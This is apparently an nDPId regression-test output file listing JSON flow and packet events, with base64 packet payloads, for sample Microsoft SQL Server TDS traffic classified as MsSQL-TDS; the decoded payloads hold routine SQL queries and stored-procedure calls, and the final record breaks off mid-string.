00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="}
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="}
00863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="}
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="}
00863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="}
00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":874,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1259762400004}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="}
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"thread_ts_msec":1259762400033,"pkt":"ABj+dhvGERERERESCABFAARiAAxAAEAGsqsKb29vCgAAARFcBZmNJzZmudpdulAYEAAslQAAAwkEOgAAAQANAHMAcABfAGUAeABlAGMAdQB0AGUAcwBxAGwAAgAAAOemAwkE0AA0pgNTAEUATABFAEMAVAAgAFQATwBQACAAOAA4ACAAWwBkAGIAbwBdAC4AWwBNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAXQAuAFsASQBEAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEUAbgB0AGkAdAB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBIAGkAcwB0AG8AcgB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBUAHkAcABlAEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBPAHAAZQByAGEAdABpAG8AbgBUAHkAcABlAEkARABdACAARgBSAE8ATQAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0AIAAgAFcASABFAFIARQAgACgAIAAoACAAKAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACAAPQAgAEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAKQApACkAIABPAFIARABFAFIAIABCAFkAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0AIABBAFMAQwAsAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEkARABdACAAQQBTAEMAAADnMAAJBNAANDAAQABIAGEAbgBkAGwAaQBuAGcAUwB0AGEAdAB1AHMAMQAgAHQAaQBuAHkAaQBuAHQAEEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAACYBAQA="}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="}
00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="}
00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7440000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3m9AAIAGks0Kb29vCgAAARoKBZn0doxX83WfcFAQ\/vLIiAAAAwQfQAAAAQAWAAAAEgAAAAIAJgAAAJ0AAAABAAAADQBwAF8AUwBhAHYAZQBFAHgAYQBtAHAAbABlAAAACkAATABvAG4AZwBQAGEAcgBhAG0AAOf\/\/wkE0AA0BCAAAAAAAAAEIAAAUwB0AHUAZABlAG4AYwBrAGkAZQAgAEsAbwBCAW8AIABQAHIAegBlAHcAbwBkAG4AaQBrAPMAdwAgAFQAdQByAHkAcwB0AHkAYwB6AG4AeQBjAGgAIAB3ACAARwBkAGEARAFzAGsAdQAKAHoAYQBwAHIAYQBzAHoAYQAgAG4AYQA6AAoAWABYAFgAVgAgAE4AbwBjAG4AZQAgAE0AYQByAHMAegBlACAAbgBhACAATwByAGkAZQBuAHQAYQBjAGoAGQEgACIARABhAHIAfAFsAHUAYgAiAAoAMAA0AC8AMAA1ACAAZwByAHUAZABuAGkAYQAgADIAMAAxADAACgAKAFcAcwB0ABkBcAAKAAoATgBvAGMAbgBlACAATQBhAHIAcwB6AGUAIABuAGEAIABPAHIAaQBlAG4AdABhAGMAagAZASAAIgBEAGEAcgB8AWwAdQBiACIAIABzAAUBIAB0AHUAcgB5AHMAdAB5AGMAegBuAAUBIABpAG0AcAByAGUAegAFASAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgACgASQBuAE8AKQAsACAAdwAgAGsAdADzAHIAZQBqACAAdQBjAHoAZQBzAHQAbgBpAGMAeQAgAG0AYQBqAAUBIAB6AGEAIAB6AGEAZABhAG4AaQBlACAAcABvAHQAdwBpAGUAcgBkAHoAaQAHASAAdwAgAG8AawByAGUAWwFsAG8AbgB5AG0AIABsAGkAbQBpAGMAaQBlACAAYwB6AGEAcwB1ACAAcwB3AG8AagAFASAAbwBiAGUAYwBuAG8AWwEHASAAcAByAHoAeQAgAHUAcwB0AGEAdwBpAG8AbgB5AGMAaAAgAHcAIAB0AGUAcgBlAG4AaQBlACAAcAB1AG4AawB0AGEAYwBoACAAawBvAG4AdAByAG8AbABuAHkAYwBoAC4AIABOAGEAIABkAGEAbgBlAGoAIAB0AHIAYQBzAGkAZQAgAHoAdwB5AGMAaQAZAXwBYQAgAHoAZQBzAHAA8wBCASwAIABrAHQA8wByAHkAIAB6AGEAIABwAG8AawBvAG4AYQBuAGkAZQAgAHQAcgBhAHMAeQAgAHUAegB5AHMAawBhAEIBIABuAGEAagBtAG4AaQBlAGoAcwB6AAUBIABsAGkAYwB6AGIAGQEgAHAAdQBuAGsAdADzAHcAIABrAGEAcgBuAHkAYwBoAC4AIABVAGMAegBlAHMAdABuAGkAawDzAHcAIABvAGIAbwB3AGkABQF6AHUAagBlACAAegBtAG8AZAB5AGYAaQBrAG8AdwBhAG4AeQAgAHIAZQBnAHUAbABhAG0AaQBuACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AGMAaAAgAGkAbQBwAHIAZQB6ACAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgAFAAVABUAEsALgAKAAoAVAB5AG0AIAByAGEAegBlAG0AIAB0AG8AdwBhAHIAegB5AHMAegB5AAcBIABuAGEAbQAgAGIAGQFkAHoAaQBlACAAYQBnAGUAbgB0ACAAMAAwADcALAAgAEoAYQBtAGUAcwAgAEIAbwBuAGQALgAgAFoAZABvAGIABQFkAHoBYwBpAGUAIABsAGkAYwBlAG4AYwBqABkBIABuAGEAIAB6AGEAYgBCAQUBZAB6AGUAbgBpAGUAIQAKAAoASgBhAGsAIABjAG8AIAByAG8AawB1ACAAbwBkAGIAGQFkAHoAaQBlACAAcwBpABkBIABrAG8AbgBrAHUAcgBzACAAbgBhACAAbgBhAGoAbAA="}
02410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nBAAIAGkswKb29vCgAAARoKBZn0dpIL83WfcFAQ\/vKFNgAAZQBwAHMAegAFASAAbgBhAHoAdwAZASAAegBlAHMAcABvAEIBdQAgAG4AYQB3AGkABQF6AHUAagAFAWMABQEgAGQAbwAgAHQAZQBtAGEAdAB1ACAAcAByAHoAZQB3AG8AZABuAGkAZQBnAG8AIABpAG0AcAByAGUAegB5AC4ACgAKADEALgAgAE8AcgBnAGEAbgBpAHoAYQB0AG8AcgAgAGkAbQBwAHIAZQB6AHkACgAKAFMAdAB1AGQAZQBuAGMAawBpAGUAIABLAG8AQgFvACAAUAByAHoAZQB3AG8AZABuAGkAawDzAHcAIABUAHUAcgB5AHMAdAB5AGMAegBuAHkAYwBoACAAdwAgAEcAZABhAEQBcwBrAHUALAAgAGQAegBpAGEAQgFhAGoABQFjAGUAIABwAHIAegB5ACAATwBkAGQAegBpAGEAbABlACAAUwB0AHUAZABlAG4AYwBrAGkAbQAgAFAAVABUAEsALgAKAEEAZAByAGUAcwA6ACAAdQBsAC4AIABTAGkAZQBkAGwAaQBjAGsAYQAgADQALAAgADgAMAAtADIAMgAyACAARwBkAGEARAFzAGsALAAgAGUALQBtAGEAaQBsADoAIABzAGsAcAB0AEAAcwBrAHAAd